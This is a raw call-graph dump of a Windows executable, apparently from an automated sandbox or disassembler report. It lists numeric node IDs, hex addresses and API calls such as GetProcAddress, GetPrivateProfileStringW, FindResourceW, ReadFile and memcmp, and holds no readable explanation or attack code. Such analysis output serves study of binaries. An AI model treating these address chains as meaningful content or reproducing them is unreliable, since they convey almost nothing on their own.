_mbscpy _mbscat GetProcAddress 38792 40b273 27 API calls 38791->38792 38793 405279 38792->38793 38831 405211 GetProcAddress 38793->38831 38795 405282 38796 40b273 27 API calls 38795->38796 38797 40528f 38796->38797 38832 405211 GetProcAddress 38797->38832 38799 405298 38800 40b273 27 API calls 38799->38800 38801 4052a5 38800->38801 38833 405211 GetProcAddress 38801->38833 38803 4052ae 38804 40b273 27 API calls 38803->38804 38805 4052bb 38804->38805 38834 405211 GetProcAddress 38805->38834 38807 4052c4 38808 40b273 27 API calls 38807->38808 38809 4052d1 38808->38809 38835 405211 GetProcAddress 38809->38835 38811 4052da 38812 40b273 27 API calls 38811->38812 38813 4052e7 38812->38813 38836 405211 GetProcAddress 38813->38836 38815 4052f0 38816 40b273 27 API calls 38815->38816 38817 4052fd 38816->38817 38837 405211 GetProcAddress 38817->38837 38819 405306 38820 40b273 27 API calls 38819->38820 38821 405313 38820->38821 38838 405211 GetProcAddress 38821->38838 38823 40531c 38824 40b273 27 API calls 38823->38824 38825 405329 38824->38825 38839 405211 GetProcAddress 38825->38839 38827 405332 38827->38784 38829 40b58d 27 API calls 38828->38829 38830 40b18c 38829->38830 38830->38791 38831->38795 38832->38799 38833->38803 38834->38807 38835->38811 38836->38815 38837->38819 38838->38823 38839->38827 38841 40440c FreeLibrary 38840->38841 38842 40436d 38841->38842 38843 40a804 8 API calls 38842->38843 38844 404377 38843->38844 38845 404383 38844->38845 38846 404405 38844->38846 38847 40b273 27 API calls 38845->38847 38846->38237 38846->38238 38846->38239 38848 40438d GetProcAddress 38847->38848 38849 40b273 27 API calls 38848->38849 38850 4043a7 GetProcAddress 38849->38850 38851 40b273 27 API calls 38850->38851 38852 4043ba GetProcAddress 38851->38852 38853 40b273 27 API calls 38852->38853 38854 4043ce GetProcAddress 38853->38854 38855 40b273 27 API calls 38854->38855 38856 4043e2 GetProcAddress 38855->38856 38857 4043f1 38856->38857 38858 4043f7 38857->38858 38859 40440c FreeLibrary 38857->38859 38858->38846 38859->38846 38861 404413 FreeLibrary 38860->38861 38862 40441e 38860->38862 38861->38862 38862->38254 38863->38250 38865 40442e 38864->38865 38866 40447e 38864->38866 38867 40b2cc 27 API calls 38865->38867 38866->38250 38868 404438 38867->38868 38869 40a804 8 API calls 38868->38869 38870 40443e 38869->38870 38871 404445 38870->38871 38872 404467 38870->38872 38873 40b273 27 API calls 38871->38873 38872->38866 38875 404475 FreeLibrary 38872->38875 38874 40444f GetProcAddress 38873->38874 38874->38872 38876 404460 38874->38876 38875->38866 38876->38872 38878 4135f6 38877->38878 38879 4135eb FreeLibrary 38877->38879 38878->38257 38879->38878 38881 4449c4 38880->38881 38882 444a52 38880->38882 38883 40b2cc 27 API calls 38881->38883 38882->38274 38882->38279 38884 4449cb 38883->38884 38885 40a804 8 API calls 38884->38885 38886 4449d1 38885->38886 38887 40b273 27 API calls 38886->38887 38888 4449dc GetProcAddress 38887->38888 38889 40b273 27 API calls 38888->38889 38890 4449f3 GetProcAddress 38889->38890 38891 40b273 27 API calls 38890->38891 38892 444a04 GetProcAddress 38891->38892 38893 40b273 27 API calls 38892->38893 38894 444a15 GetProcAddress 38893->38894 38895 40b273 27 API calls 38894->38895 38896 444a26 GetProcAddress 38895->38896 38897 40b273 27 API calls 38896->38897 38898 444a37 GetProcAddress 38897->38898 38899 40b273 27 API calls 38898->38899 38900 444a48 GetProcAddress 38899->38900 38900->38882 38901->38285 38902->38285 38903->38285 38904->38285 38905->38275 38907 403a29 38906->38907 38921 403bed memset memset 38907->38921 38909 403ae7 38934 40b1ab free free 38909->38934 38910 403a3f memset 38915 403a2f 38910->38915 38912 403aef 38912->38293 38913 40a8d0 7 API calls 38913->38915 38914 409d1f 6 API calls 38914->38915 38915->38909 38915->38910 38915->38913 38915->38914 38916 409b98 GetFileAttributesW 38915->38916 38916->38915 38918 40a051 GetFileTime CloseHandle 38917->38918 38919 4039ca CompareFileTime 38917->38919 38918->38919 38919->38293 38920->38292 38922 414c2e 14 API calls 38921->38922 38923 403c38 38922->38923 38924 409719 2 API calls 38923->38924 38925 403c3f wcscat 38924->38925 38926 414c2e 14 API calls 38925->38926 38927 403c61 38926->38927 38928 409719 2 API calls 38927->38928 38929 403c68 wcscat 38928->38929 38935 403af5 38929->38935 38932 403af5 20 API calls 38933 403c95 38932->38933 38933->38915 38934->38912 38936 403b02 38935->38936 38937 40ae18 9 API calls 38936->38937 38945 403b37 38937->38945 38938 403bdb 38940 40aebe FindClose 38938->38940 38939 40add4 wcscmp wcscmp 38939->38945 38941 403be6 38940->38941 38941->38932 38942 40ae18 9 API calls 38942->38945 38943 40ae51 9 API calls 38943->38945 38944 40aebe FindClose 38944->38945 38945->38938 38945->38939 38945->38942 38945->38943 38945->38944 38946 40a8d0 7 API calls 38945->38946 38946->38945 38948 409d1f 6 API calls 38947->38948 38949 404190 38948->38949 38962 409b98 GetFileAttributesW 38949->38962 38951 40419c 38952 4041a7 6 API calls 38951->38952 38953 40435c 38951->38953 38954 40424f 38952->38954 38953->38319 38954->38953 38956 40425e memset 38954->38956 38958 409d1f 6 API calls 38954->38958 38959 40a8ab 9 API calls 38954->38959 38963 414842 38954->38963 38956->38954 38957 404296 wcscpy 38956->38957 38957->38954 38958->38954 38960 4042b6 memset memset _snwprintf wcscpy 38959->38960 38960->38954 38961->38317 38962->38951 38966 41443e 38963->38966 38965 414866 38965->38954 38967 41444b 38966->38967 38968 414451 38967->38968 38969 4144a3 GetPrivateProfileStringW 38967->38969 38970 414491 38968->38970 38971 414455 wcschr 38968->38971 38969->38965 38973 414495 WritePrivateProfileStringW 38970->38973 38971->38970 38972 414463 _snwprintf 38971->38972 38972->38973 38973->38965 38974->38323 38976 40b2cc 27 API calls 38975->38976 38977 409615 38976->38977 38978 409d1f 6 API calls 38977->38978 38979 409625 38978->38979 39004 409b98 GetFileAttributesW 38979->39004 38981 409634 38982 409648 38981->38982 39005 4091b8 memset 38981->39005 38983 40b2cc 27 API calls 38982->38983 38986 408801 38982->38986 38985 40965d 38983->38985 38987 409d1f 6 API calls 38985->38987 38986->38326 38986->38353 38988 40966d 38987->38988 39057 409b98 GetFileAttributesW 38988->39057 38990 40967c 38990->38986 38991 409681 38990->38991 39058 409529 72 API calls 38991->39058 38993 409690 38993->38986 38994->38348 38995->38353 38996->38354 38997->38353 38998->38359 38999->38360 39004->38981 39059 40a6e6 WideCharToMultiByte 39005->39059 39007 409202 39060 444432 39007->39060 39010 40b273 27 API calls 39011 409236 39010->39011 39106 438552 39011->39106 39014 409383 39016 40b273 27 API calls 39014->39016 39017 409399 39016->39017 39020 438552 133 API calls 39017->39020 39018 40937b 39131 424f26 122 API calls 39018->39131 39019 409254 39019->39018 39127 4253cf 17 API calls 39019->39127 39039 4093a3 39020->39039 39023 4094ff 39135 443d90 39023->39135 39024 409267 39128 4253cf 17 API calls 39024->39128 39027 4251c4 136 API calls 39027->39039 39028 409273 39129 4253af 17 API calls 39028->39129 39029 409507 39036 40951d 39029->39036 39155 408f2f 77 API calls 39029->39155 39031 4093df 39134 424f26 122 API calls 39031->39134 39033 4253cf 17 API calls 39033->39039 39036->38982 39039->39023 39039->39027 39039->39031 39039->39033 39041 4093e4 39039->39041 39132 4253af 17 API calls 39041->39132 39047 4093ed 39133 4253af 17 API calls 39047->39133 39050 4093f9 39050->39031 39051 409409 memcmp 39050->39051 39051->39031 39052 409421 memcmp 39051->39052 39053 4094a4 memcmp 39052->39053 39054 409435 39052->39054 39053->39031 39056 4094b8 memcpy memcpy 39053->39056 39054->39031 39055 409442 memcpy memcpy memcpy 39054->39055 39055->39031 39056->39031 39057->38990 39058->38993 39059->39007 39156 4438b5 39060->39156 39062 44444c 39063 409215 39062->39063 39170 415a6d 39062->39170 39063->39010 39063->39036 39066 444486 39068 4444b9 memcpy 39066->39068 39105 4444a4 39066->39105 39067 44469e 39067->39063 39070 443d90 110 API calls 39067->39070 39174 415258 39068->39174 39070->39063 39071 444524 39072 444541 39071->39072 39073 44452a 39071->39073 39177 444316 39072->39177 39211 416935 39073->39211 39077 444316 18 API calls 39078 444563 39077->39078 39079 444316 18 API calls 39078->39079 39080 44456f 39079->39080 39081 444316 18 API calls 39080->39081 39082 44457f 39081->39082 39082->39105 39191 432d4e 39082->39191 39085 444316 18 API calls 39086 4445b0 39085->39086 39224 4442e6 11 API calls 39105->39224 39225 438460 39106->39225 39108 409240 39108->39014 39109 4251c4 39108->39109 39237 424f07 39109->39237 39111 4251e4 39112 4251f7 39111->39112 39113 4251e8 39111->39113 39245 4250f8 39112->39245 39244 4446ea 11 API calls 39113->39244 39115 4251f2 39115->39019 39117 425209 39119 425249 39117->39119 39123 4250f8 126 API calls 39117->39123 39124 425287 39117->39124 39253 4384e9 134 API calls 39117->39253 39254 424f74 123 API calls 39117->39254 39119->39124 39255 424ff0 13 API calls 39119->39255 39123->39117 39257 415c7d 16 API calls 39124->39257 39125 425266 39125->39124 39256 415be9 memcpy 39125->39256 39127->39024 39128->39028 39131->39014 39132->39047 39133->39050 39134->39023 39136 443da3 39135->39136 39137 443db6 39135->39137 39258 41707a 11 API calls 39136->39258 39137->39029 39139 443da8 39140 443dbc 39139->39140 39141 443dac 39139->39141 39260 4300e8 memset memset memcpy 39140->39260 39259 4446ea 11 API calls 39141->39259 39144 443de0 39146 416935 16 API calls 39144->39146 39145 443dce 39145->39144 39149 443e22 39145->39149 39146->39137 39147 443e5a 39149->39147 39261 41f0ac 102 API calls 39149->39261 39155->39036 39157 4438d0 39156->39157 39167 4438c9 39156->39167 39158 415378 memcpy memcpy 39157->39158 39159 4438d5 39158->39159 39160 4154e2 10 API calls 39159->39160 39161 443906 39159->39161 39159->39167 39160->39161 39162 443970 memset 39161->39162 39161->39167 39165 44398b 39162->39165 39163 4439a0 39164 415700 10 API calls 39163->39164 39163->39167 39168 4439c0 39164->39168 39165->39163 39166 41975c 10 API calls 39165->39166 39166->39163 39167->39062 39168->39167 39169 418981 10 API calls 39168->39169 39169->39167 39171 415a77 39170->39171 39172 415a8d 39171->39172 39173 415a7e memset 39171->39173 39172->39066 39173->39172 39175 4438b5 11 API calls 39174->39175 39176 41525d 39175->39176 39176->39071 39178 444328 39177->39178 39179 444423 39178->39179 39180 44434e 39178->39180 39182 4446ea 11 API calls 39179->39182 39181 432d4e memset memset memcpy 39180->39181 39183 44435a 39181->39183 39188 444381 39182->39188 39185 444375 39183->39185 39190 44438b 39183->39190 39184 432d4e memset memset memcpy 39186 4443ec 39184->39186 39187 416935 16 API calls 39185->39187 39186->39188 39189 416935 16 API calls 39186->39189 39187->39188 39188->39077 39189->39188 39190->39184 39192 432d65 39191->39192 39193 432d58 39191->39193 39192->39085 39194 432cc4 memset memset memcpy 39193->39194 39194->39192 39212 41693e 39211->39212 39215 41698e 39211->39215 39213 41694c 39212->39213 39214 422fd1 memset 39212->39214 39213->39215 39216 4165a0 11 API calls 39213->39216 39214->39213 39215->39105 39217 416972 39216->39217 39217->39215 39218 422b84 15 API calls 39217->39218 39218->39215 39224->39067 39226 41703f 11 API calls 39225->39226 39227 43847a 39226->39227 39228 43848a 39227->39228 39229 43847e 39227->39229 39231 438270 133 API calls 39228->39231 39230 4446ea 11 API calls 39229->39230 39233 438488 39230->39233 39232 4384aa 39231->39232 39232->39233 39234 424f26 122 API calls 39232->39234 39233->39108 39235 4384bb 39234->39235 39236 438270 133 API calls 39235->39236 39236->39233 39238 424f1f 39237->39238 39239 424f0c 39237->39239 39241 424eea 11 API calls 39238->39241 39240 416760 11 API calls 39239->39240 39242 424f18 39240->39242 39243 424f24 39241->39243 39242->39111 39243->39111 39244->39115 39246 425108 39245->39246 39252 42510d 39245->39252 39247 424f74 123 API calls 39246->39247 39247->39252 39248 42569b 124 API calls 39249 42516e 39248->39249 39251 415c7d 16 API calls 39249->39251 39250 425115 39250->39117 39251->39250 39252->39248 39252->39250 39253->39117 39254->39117 39255->39125 39256->39124 39257->39115 39258->39139 39259->39137 39260->39145 39261->39149 39291 413f4f 39264->39291 39267 413f37 K32GetModuleFileNameExW 39268 413f4a 39267->39268 39268->38382 39270 413969 wcscpy 39269->39270 39271 41396c wcschr 39269->39271 39283 413a3a 39270->39283 39271->39270 39273 41398e 39271->39273 39296 4097f7 wcslen wcslen _memicmp 39273->39296 39275 41399a 39276 4139a4 memset 39275->39276 39277 4139e6 39275->39277 39297 409dd5 GetWindowsDirectoryW wcscpy 39276->39297 39279 413a31 wcscpy 39277->39279 39280 4139ec memset 39277->39280 39279->39283 39298 409dd5 GetWindowsDirectoryW wcscpy 39280->39298 39281 4139c9 wcscpy wcscat 39281->39283 39283->38382 39284 413a11 memcpy wcscat 39284->39283 39286 413cb0 GetModuleHandleW 39285->39286 39287 413cda 39285->39287 39286->39287 39288 413cbf GetProcAddress 39286->39288 39289 413ce3 GetProcessTimes 39287->39289 39290 413cf6 39287->39290 39288->39287 39289->38388 39290->38388 39292 413f2f 39291->39292 39293 413f54 39291->39293 39292->39267 39292->39268 39294 40a804 8 API calls 39293->39294 39295 413f5f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 39294->39295 39295->39292 39296->39275 39297->39281 39298->39284 39299->38408 39300->38431 39302 409cf9 GetVersionExW 39301->39302 39303 409d0a 39301->39303 39302->39303 39303->38437 39303->38441 39304->38445 39305->38447 39306->38513 39308 40bba5 39307->39308 39355 40cc26 39308->39355 39311 40bd4b 39376 40cc0c 39311->39376 39316 40b2cc 27 API calls 39317 40bbef 39316->39317 39383 40ccf0 _wcsicmp 39317->39383 39319 40bbf5 39319->39311 39384 40ccb4 6 API calls 39319->39384 39321 40bc26 39322 40cf04 17 API calls 39321->39322 39323 40bc2e 39322->39323 39324 40bd43 39323->39324 39325 40b2cc 27 API calls 39323->39325 39326 40cc0c 4 API calls 39324->39326 39327 40bc40 39325->39327 39326->39311 39385 40ccf0 _wcsicmp 39327->39385 39329 40bc46 39329->39324 39330 40bc61 memset memset WideCharToMultiByte 39329->39330 39386 40103c strlen 39330->39386 39332 40bcc0 39333 40b273 27 API calls 39332->39333 39334 40bcd0 memcmp 39333->39334 39334->39324 39335 40bce2 39334->39335 39336 404423 37 API calls 39335->39336 39337 40bd10 39336->39337 39337->39324 39338 40bd3a LocalFree 39337->39338 39339 40bd1f memcpy 39337->39339 39338->39324 39339->39338 39340->38528 39342 409a74 GetTempFileNameW 39341->39342 39343 409a66 GetWindowsDirectoryW 39341->39343 39342->38527 39343->39342 39344->38562 39345->38562 39346->38562 39347->38562 39348->38562 39349->38562 39350->38562 39351->38562 39352->38562 39353->38538 39354->38559 39387 4096c3 CreateFileW 39355->39387 39357 40cc34 39358 40cc3d GetFileSize 39357->39358 39366 40bbca 39357->39366 39359 40afcf 2 API calls 39358->39359 39360 40cc64 39359->39360 39388 40a2ef ReadFile 39360->39388 39362 40cc71 39389 40ab4a MultiByteToWideChar 39362->39389 39364 40cc95 CloseHandle 39365 40b04b ??3@YAXPAX 39364->39365 39365->39366 39366->39311 39367 40cf04 39366->39367 39368 40b633 free 39367->39368 39369 40cf14 39368->39369 39395 40b1ab free free 39369->39395 39371 40bbdd 39371->39311 39371->39316 39372 40cf1b 39372->39371 39374 40cfef 39372->39374 39396 40cd4b 39372->39396 39375 40cd4b 14 API calls 39374->39375 39375->39371 39377 40b633 free 39376->39377 39378 40cc15 39377->39378 39379 40aa04 free 39378->39379 39380 40cc1d 39379->39380 39442 40b1ab free free 39380->39442 39382 40b7d4 memset CreateFileW 39382->38520 39382->38521 39383->39319 39384->39321 39385->39329 39386->39332 39387->39357 39388->39362 39390 40ab93 39389->39390 39391 40ab6b 39389->39391 39390->39364 39392 40a9ce 4 API calls 39391->39392 39393 40ab74 39392->39393 39394 40ab7c MultiByteToWideChar 39393->39394 39394->39390 39395->39372 39397 40cd7b 39396->39397 39430 40aa29 6 API calls 39397->39430 39399 40cef5 39400 40aa04 free 39399->39400 39401 40cefd 39400->39401 39401->39372 39402 40cd89 39402->39399 39431 40aa29 6 API calls 39402->39431 39404 40ce1d 39432 40aa29 6 API calls 39404->39432 39406 40ce3e 39407 40ce6a 39406->39407 39433 40abb7 wcslen memmove 39406->39433 39408 40ce9f 39407->39408 39436 40abb7 wcslen memmove 39407->39436 39439 40a8d0 7 API calls 39408->39439 39412 40ce56 39434 40aa71 wcslen 39412->39434 39413 40ce8b 39437 40aa71 wcslen 39413->39437 39414 40ceb5 39440 40a8d0 7 API calls 39414->39440 39417 40ce5e 39435 40abb7 wcslen memmove 39417->39435 39418 40ce93 39438 40abb7 wcslen memmove 39418->39438 39422 40cecb 39441 40d00b malloc memcpy free free 39422->39441 39424 40cedd 39425 40aa04 free 39424->39425 39426 40cee5 39425->39426 39427 40aa04 free 39426->39427 39428 40ceed 39427->39428 39429 40aa04 free 39428->39429 39429->39399 39430->39402 39431->39404 39432->39406 39433->39412 39434->39417 39435->39407 39436->39413 39437->39418 39438->39408 39439->39414 39440->39422 39441->39424 39442->39382 39443->38578 39444->38586 39445 44dea5 39446 44deb5 FreeLibrary 39445->39446 39447 44dec3 39445->39447 39446->39447 39448 4147f3 39451 414561 39448->39451 39450 414813 39452 41456d 39451->39452 39453 41457f GetPrivateProfileIntW 39451->39453 39456 4143f1 memset _itow WritePrivateProfileStringW 39452->39456 39453->39450 39455 41457a 39455->39450 39456->39455 39457 4287c1 39458 4287d2 39457->39458 39459 429ac1 39457->39459 39460 428818 39458->39460 39461 42881f 39458->39461 39476 425711 39458->39476 39471 425ad6 39459->39471 39527 415c56 11 API calls 39459->39527 39494 42013a 39460->39494 39522 420244 96 API calls 39461->39522 39466 4260dd 39521 424251 119 API calls 39466->39521 39468 4259da 39520 416760 11 API calls 39468->39520 39472 429a4d 39477 429a66 39472->39477 39478 429a9b 39472->39478 39475 422aeb memset memcpy memcpy 39475->39476 39476->39459 39476->39468 39476->39472 39476->39475 39482 4260a1 39476->39482 39490 4259c2 39476->39490 39493 425a38 39476->39493 39510 4227f0 memset memcpy 39476->39510 39511 422b84 15 API calls 39476->39511 39512 422b5d memset memcpy memcpy 39476->39512 39513 422640 13 API calls 39476->39513 39515 4241fc 11 API calls 39476->39515 39516 42413a 89 API calls 39476->39516 39523 415c56 11 API calls 39477->39523 39481 429a96 39478->39481 39525 416760 11 API calls 39478->39525 39526 424251 119 API calls 39481->39526 39519 415c56 11 API calls 39482->39519 39484 429a7a 39524 416760 11 API calls 39484->39524 39490->39471 39514 415c56 11 API calls 39490->39514 39493->39490 39517 422640 13 API calls 39493->39517 39518 4226e0 12 API calls 39493->39518 39495 42014c 39494->39495 39498 420151 39494->39498 39537 41e466 96 API calls 39495->39537 39497 420162 39497->39476 39498->39497 39499 4201b3 39498->39499 39500 420229 39498->39500 39501 4201b8 39499->39501 39502 4201dc 39499->39502 39500->39497 39503 41fd5e 85 API calls 39500->39503 39528 41fbdb 39501->39528 39502->39497 39507 4201ff 39502->39507 39534 41fc4c 39502->39534 39503->39497 39507->39497 39509 42013a 96 API calls 39507->39509 39509->39497 39510->39476 39511->39476 39512->39476 39513->39476 39514->39468 39515->39476 39516->39476 39517->39493 39518->39493 39519->39468 39520->39466 39521->39471 39522->39476 39523->39484 39524->39481 39525->39481 39526->39459 39527->39468 39529 41fbf1 39528->39529 39530 41fbf8 39528->39530 39533 41fc39 39529->39533 39552 4446ce 11 API calls 39529->39552 39542 41ee26 39530->39542 39533->39497 39538 41fd5e 39533->39538 39535 41ee6b 85 API calls 39534->39535 39536 41fc5d 39535->39536 39536->39502 39537->39498 39539 41fd65 39538->39539 39540 41fdab 39539->39540 39541 41fbdb 85 API calls 39539->39541 39540->39497 39541->39539 39543 41ee41 39542->39543 39544 41ee32 39542->39544 39553 41edad 39543->39553 39556 4446ce 11 API calls 39544->39556 39547 41ee3c 39547->39529 39550 41ee58 39550->39547 39558 41ee6b 39550->39558 39552->39533 39562 41be52 39553->39562 39556->39547 39557 41eb85 11 API calls 39557->39550 39559 41ee70 39558->39559 39560 41ee78 39558->39560 39615 41bf99 85 API calls 39559->39615 39560->39547 39563 41be6f 39562->39563 39564 41be5f 39562->39564 39569 41be8c 39563->39569 39594 418c63 memset memset 39563->39594 39593 4446ce 11 API calls 39564->39593 39566 41be69 39566->39547 39566->39557 39569->39566 39570 41bf3a 39569->39570 39572 41bed1 39569->39572 39579 41bee7 39569->39579 39597 4446ce 11 API calls 39570->39597 39573 41bef0 39572->39573 39574 41bee2 39572->39574 39576 41bf01 39573->39576 39573->39579 39583 41ac13 39574->39583 39575 41bf24 memset 39575->39566 39576->39575 39578 41bf14 39576->39578 39595 418a6d memset memcpy memset 39576->39595 39596 41a223 memset memcpy memset 39578->39596 39579->39566 39598 41a453 85 API calls 39579->39598 39582 41bf20 39582->39575 39584 41ac3f memset 39583->39584 39585 41ac52 39583->39585 39590 41acd9 39584->39590 39587 41ac6a 39585->39587 39599 41dc14 19 API calls 39585->39599 39589 41aca1 39587->39589 39600 41519d 39587->39600 39589->39590 39591 41acc0 memset 39589->39591 39592 41accd memcpy 39589->39592 39590->39579 39591->39590 39592->39590 39593->39566 39594->39569 39595->39578 39596->39582 39597->39579 39599->39587 39603 4175ed 39600->39603 39611 417570 SetFilePointer 39603->39611 39606 41760a ReadFile 39608 417637 39606->39608 39609 417627 GetLastError 39606->39609 39607 4151b3 39607->39589 39608->39607 39610 41763e memset 39608->39610 39609->39607 39610->39607 39612 4175b2 39611->39612 39613 41759c GetLastError 39611->39613 39612->39606 39612->39607 39613->39612 39614 4175a8 GetLastError 39613->39614 39614->39612 39615->39560 39616 417bc5 39617 417c61 39616->39617 39618 417bda 39616->39618 39618->39617 39619 417bf6 UnmapViewOfFile CloseHandle 39618->39619 39621 417c2c 39618->39621 39623 4175b7 39618->39623 39619->39618 39619->39619 39621->39618 39628 41851e 18 API calls 39621->39628 39624 4175d6 CloseHandle 39623->39624 39625 4175c8 39624->39625 39626 4175df 39624->39626 39625->39626 39627 4175ce Sleep 39625->39627 39626->39618 39627->39624 39628->39621 39629 415304 free 39630 4152c6 malloc 39631 4152e2 39630->39631 39632 4152ef 39630->39632 39634 416760 11 API calls 39632->39634 39634->39631 39635 4148b6 FindResourceW 39636 4148cf SizeofResource 39635->39636 39639 4148f9 39635->39639 39637 4148e0 LoadResource 39636->39637 39636->39639 39638 4148ee LockResource 39637->39638 39637->39639 39638->39639 39640 441b3f 39650 43a9f6 39640->39650 39642 441b61 39823 4386af memset 39642->39823 39644 44189a 39645 442bd4 39644->39645 39646 4418e2 39644->39646 39647 4418ea 39645->39647 39825 441409 memset 39645->39825 39646->39647 39824 4414a9 12 API calls 39646->39824 39651 43aa20 39650->39651 39652 43aadf 39650->39652 39651->39652 39653 43aa34 memset 39651->39653 39652->39642 39654 43aa56 39653->39654 39655 43aa4d 39653->39655 39826 43a6e7 39654->39826 39834 42c02e memset 39655->39834 39660 43aad3 39836 4169a7 11 API calls 39660->39836 39661 43aaae 39661->39652 39661->39660 39676 43aae5 39661->39676 39662 43ac18 39665 43ac47 39662->39665 39838 42bbd5 memcpy memcpy memcpy memset memcpy 39662->39838 39666 43aca8 39665->39666 39839 438eed 16 API calls 39665->39839 39670 43acd5 39666->39670 39841 4233ae 11 API calls 39666->39841 39669 43ac87 39840 4233c5 16 API calls 39669->39840 39842 423426 11 API calls 39670->39842 39674 43ace1 39843 439811 162 API calls 39674->39843 39675 43a9f6 160 API calls 39675->39676 39676->39652 39676->39662 39676->39675 39837 439bbb 22 API calls 39676->39837 39678 43acfd 39683 43ad2c 39678->39683 39844 438eed 16 API calls 39678->39844 39680 43ad19 39845 4233c5 16 API calls 39680->39845 39682 43ad58 39846 44081d 162 API calls 39682->39846 39683->39682 39686 43add9 39683->39686 39850 423426 11 API calls 39686->39850 39687 43ae3a memset 39688 43ae73 39687->39688 39851 42e1c0 146 API calls 39688->39851 39689 43adab 39848 438c4e 162 API calls 39689->39848 39690 43ad6c 39690->39652 39690->39689 39847 42370b memset memcpy memset 39690->39847 39694 43adcc 39849 440f84 12 API calls 39694->39849 39695 43ae96 39852 42e1c0 146 API calls 39695->39852 39698 43aea8 39699 43aec1 39698->39699 39853 42e199 146 API calls 39698->39853 39701 43af00 39699->39701 39854 42e1c0 146 API calls 39699->39854 39701->39652 39704 43af1a 39701->39704 39705 43b3d9 39701->39705 39855 438eed 16 API calls 39704->39855 39710 43b3f6 39705->39710 39714 43b4c8 39705->39714 39706 43b60f 39706->39652 39914 4393a5 17 API calls 39706->39914 39709 43af2f 39856 4233c5 16 API calls 39709->39856 39896 432878 12 API calls 39710->39896 39712 43af51 39857 423426 11 API calls 39712->39857 39721 43b4f2 39714->39721 39902 42bbd5 memcpy memcpy memcpy memset memcpy 39714->39902 39716 43af7d 39858 423426 11 API calls 39716->39858 39720 43af94 39859 423330 11 API calls 39720->39859 39903 43a76c 21 API calls 39721->39903 39722 43b529 39904 44081d 162 API calls 39722->39904 39723 43b462 39898 423330 11 API calls 39723->39898 39727 43b428 39727->39723 39897 432b60 16 API calls 39727->39897 39728 43afca 39860 423330 11 API calls 39728->39860 39729 43b47e 39733 43b497 39729->39733 39899 42374a memcpy memset memcpy memcpy memcpy 39729->39899 39730 43b544 39731 43b55c 39730->39731 39905 42c02e memset 39730->39905 39906 43a87a 162 API calls 39731->39906 39900 4233ae 11 API calls 39733->39900 39735 43afdb 39861 4233ae 11 API calls 39735->39861 39739 43b4b1 39901 423399 11 API calls 39739->39901 39741 43b56c 39744 43b58a 39741->39744 39907 423330 11 API calls 39741->39907 39743 43afee 39862 44081d 162 API calls 39743->39862 39908 440f84 12 API calls 39744->39908 39745 43b4c1 39910 42db80 162 API calls 39745->39910 39750 43b592 39909 43a82f 16 API calls 39750->39909 39753 43b5b4 39911 438c4e 162 API calls 39753->39911 39755 43b5cf 39912 42c02e memset 39755->39912 39757 43b005 39757->39652 39762 43b01f 39757->39762 39863 42d836 162 API calls 39757->39863 39758 43b1ef 39873 4233c5 16 API calls 39758->39873 39760 43b212 39874 423330 11 API calls 39760->39874 39762->39758 39871 423330 11 API calls 39762->39871 39872 42d71d 162 API calls 39762->39872 39764 43b087 39864 4233ae 11 API calls 39764->39864 39765 43add4 39765->39706 39913 438f86 16 API calls 39765->39913 39768 43b22a 39875 42ccb5 11 API calls 39768->39875 39771 43b23f 39876 4233ae 11 API calls 39771->39876 39772 43b10f 39867 423330 11 API calls 39772->39867 39774 43b257 39877 4233ae 11 API calls 39774->39877 39778 43b129 39868 4233ae 11 API calls 39778->39868 39779 43b26e 39878 4233ae 11 API calls 39779->39878 39782 43b09a 39782->39772 39865 42cc15 19 API calls 39782->39865 39866 4233ae 11 API calls 39782->39866 39783 43b282 39879 43a87a 162 API calls 39783->39879 39785 43b13c 39869 440f84 12 API calls 39785->39869 39787 43b29d 39880 423330 11 API calls 39787->39880 39790 43b2af 39793 43b2b8 39790->39793 39794 43b2ce 39790->39794 39791 43b15f 39870 4233ae 11 API calls 39791->39870 39881 4233ae 11 API calls 39793->39881 39882 440f84 12 API calls 39794->39882 39797 43b2c9 39884 4233ae 11 API calls 39797->39884 39798 43b2da 39883 42370b memset memcpy memset 39798->39883 39801 43b2f9 39885 423330 11 API calls 39801->39885 39803 43b30b 39886 423330 11 API calls 39803->39886 39805 43b325 39887 423399 11 API calls 39805->39887 39807 43b332 39888 4233ae 11 API calls 39807->39888 39809 43b354 39889 423399 11 API calls 39809->39889 39811 43b364 39890 43a82f 16 API calls 39811->39890 39813 43b370 39891 42db80 162 API calls 39813->39891 39815 43b380 39892 438c4e 162 API calls 39815->39892 39817 43b39e 39893 423399 11 API calls 39817->39893 39819 43b3ae 39894 43a76c 21 API calls 39819->39894 39821 43b3c3 39895 423399 11 API calls 39821->39895 39823->39644 39824->39647 39825->39645 39827 43a6f5 39826->39827 39828 43a765 39826->39828 39827->39828 39915 42a115 39827->39915 39828->39652 39835 4397fd memset 39828->39835 39832 43a73d 39832->39828 39833 42a115 146 API calls 39832->39833 39833->39828 39834->39654 39835->39661 39836->39652 39837->39676 39838->39665 39839->39669 39840->39666 39841->39670 39842->39674 39843->39678 39844->39680 39845->39683 39846->39690 39847->39689 39848->39694 39849->39765 39850->39687 39851->39695 39852->39698 39853->39699 39854->39699 39855->39709 39856->39712 39857->39716 39858->39720 39859->39728 39860->39735 39861->39743 39862->39757 39863->39764 39864->39782 39865->39782 39866->39782 39867->39778 39868->39785 39869->39791 39870->39762 39871->39762 39872->39762 39873->39760 39874->39768 39875->39771 39876->39774 39877->39779 39878->39783 39879->39787 39880->39790 39881->39797 39882->39798 39883->39797 39884->39801 39885->39803 39886->39805 39887->39807 39888->39809 39889->39811 39890->39813 39891->39815 39892->39817 39893->39819 39894->39821 39895->39765 39896->39727 39897->39723 39898->39729 39899->39733 39900->39739 39901->39745 39902->39721 39903->39722 39904->39730 39905->39731 39906->39741 39907->39744 39908->39750 39909->39745 39910->39753 39911->39755 39912->39765 39913->39706 39914->39652 39916 42a175 39915->39916 39918 42a122 39915->39918 39916->39828 39921 42b13b 146 API calls 39916->39921 39918->39916 39919 42a115 146 API calls 39918->39919 39922 43a174 39918->39922 39946 42a0a8 146 API calls 39918->39946 39919->39918 39921->39832 39934 43a196 39922->39934 39937 43a19e 39922->39937 39923 43a306 39923->39934 39966 4388c4 14 API calls 39923->39966 39926 42a115 146 API calls 39926->39937 39928 43a642 39928->39934 39970 4169a7 11 API calls 39928->39970 39932 43a635 39969 42c02e memset 39932->39969 39934->39918 39937->39923 39937->39926 39937->39934 39947 42ff8c 39937->39947 39955 415a91 39937->39955 39959 4165ff 39937->39959 39962 439504 13 API calls 39937->39962 39963 4312d0 146 API calls 39937->39963 39964 42be4c memcpy memcpy memcpy memset memcpy 39937->39964 39965 43a121 11 API calls 39937->39965 39939 43a325 39939->39928 39939->39932 